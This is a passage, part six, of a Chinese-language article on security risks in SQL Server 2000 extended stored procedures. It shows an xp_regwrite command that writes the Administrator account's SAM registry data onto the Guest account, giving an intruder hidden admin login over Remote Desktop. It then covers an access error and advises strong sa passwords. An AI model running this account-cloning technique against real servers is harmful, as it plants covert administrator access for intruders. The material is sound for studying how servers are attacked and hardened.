SQL Server中存储过程的安全问题(6)

然后再执行：

xp_regwrite 'HKEY_LOCAL_MACHINE', 'SAM\SAM\Domains\Account\Users\000001F5', 'F','reg_binary',0x…(上一步得到的那串字符)

如果被入侵机器开了3389服务，那入侵者就可以用GUEST登陆了，密码为空，而且Guest的桌面与administrator的完全一样。在这里有个问题需要讲一下，有时候在执行xp_regread 'HKEY_LOCAL_MACHINE','SAM\SAM\Domains\Account\Users\000001F4','F'

时，出现的提示是：

错误：

消息 22001，级别 1，状态 22001

RegOpenKeyEx() returned error 2, '系统找不到指定的文件。'

（所影响的行数为 0 行）

开始以为是SQL Server版本的问题，后来经过测试发现，此问题存在在各个版本的SQL SERVER，个人认为可能与对方系统当前用户对'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4'的访问权限有关，如果当前的用户在本地计算机无法访问该注册表项，就会出现这个提示，我将继续研究，解决这个问题，也希望知道原因和解决办法的朋友给予指点，谢谢。

以前看过SQL大侠写的一篇《一次简单的SQL Server的安全测试》文章，主要内容是IIS危险虚拟目录结合Sa为空的一次入侵测试，让我们意识到尽管我们对SQL Server做了一定的安全设置，可是功能强大的SQL Server给使用者提供方便的同时，也有可能被入侵者利用。所以最安全的方法就是给你的Sa和系统用户起一个健壮的口令，以不变应万变。

以上两台机器的测试环境均为win2000高级服务器版(sp4)+SQLServer2000(sp3)

本文方法仅供研究，请勿用于破坏上，由本文方法造成任何损失，由使用者负责，本人概不负责。